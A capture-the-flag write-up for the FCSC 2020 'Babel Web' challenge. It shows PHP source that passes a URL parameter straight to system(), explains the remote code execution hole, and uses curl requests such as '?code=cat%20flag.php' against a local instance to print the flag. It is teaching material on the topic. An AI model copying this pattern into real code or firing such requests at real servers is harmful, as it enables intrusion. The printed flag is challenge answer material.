Writeup by aureylz for Babel Web

intro web

December 1, 2023

Table of contents

Challenge

Description

You need to audit this site under construction, and search for a flag.

Challenge instructions

  1. First, download docker-compose.yml:
    curl https://hackropole.fr/challenges/fcsc2020-web-babel-web/docker-compose.public.yml -o docker-compose.yml
  2. Launch the challenge by executing in the same folder:
    docker compose up
  3. Access the challenge at http://localhost:8000/.

Author

Cryptanalyse

First steps

First thing i usually do is inspecting the html code of the web page in case there’s something interesting :

┌──(aureylz㉿kali)-[~/ctf/hackropole/hackropole_2023/babel_web]
└─$ curl http://127.0.0.1:8000
<html>
	<head>
		<title>Bienvenue à Babel Web!</title>
	</head>
	<body>
		<h1>Bienvenue à Babel Web!</h1>
		La page est en cours de développement, merci de revenir plus tard.
		<!-- <a href="?source=1">source</a> -->
	</body>
</html>

And actually, there’s something interesting in a html comment.

I tried to access to the new link and I found this :

<?php
    if (isset($_GET['source'])) {
        @show_source(__FILE__);
    }  else if(isset($_GET['code'])) {
        print("<pre>");
        @system($_GET['code']);
        print("<pre>");
    } else {
?>
<html>
    <head>
        <title>Bienvenue à Babel Web!</title>
    </head>
    <body>
        <h1>Bienvenue à Babel Web!</h1>
        La page est en cours de développement, merci de revenir plus tard.
        <!-- <a href="?source=1">source</a> -->
    </body>
</html>
<?php
    }
?>

PHP code analysis

The PHP script contains two main conditional blocks that check for different query parameters (source and code) in the URL.

  1. Source code disclosure
    • The first if statement checks if the source parameter is set in the URL (isset($_GET['source'])).
    • If it is set, the script uses @show_source(__FILE__); to display the source code of the current PHP file.
    • This feature is likely intended for debugging, but in a real-world scenario, it poses a security risk by revealing the server-side code to anyone who knows to add ?source=1 to the URL.
  2. Remote code execution vulnerability (RCE)
    • The else if statement checks for the presence of the code parameter in the URL (isset($_GET['code'])).
    • If this parameter is present, the script executes the command supplied in the code parameter through @system($_GET['code']);.
    • This is a critical vulnerability as it allows the execution of arbitrary system commands directly from the URL. For example, accessing http://127.0.0.1:8000/?code=ls would execute the ls command on the server.
    • The use of <pre> tags before and after the system call is likely for formatting the output in a readable way on the web page.

Test first hypothesis

┌──(aureylz㉿kali)-[~/ctf/hackropole/hackropole_2023/babel_web]
└─$ curl http://127.0.0.1:8000/?code=ls
<pre>flag.php
index.php
<pre>

So I found the flag, I just need to use the cat flag.php command. To do so, I’ll need to URL-encode the space like this :

┌──(aureylz㉿kali)-[~/ctf/hackropole/hackropole_2023/babel_web]
└─$ curl http://127.0.0.1:8000/?code=cat%20flag.php
<pre><?php
	$flag = "FCSC{5d969396bb5592634b31d4f0846d945e4befbb8c470b055ef35c0ac090b9b8b7}";
<pre>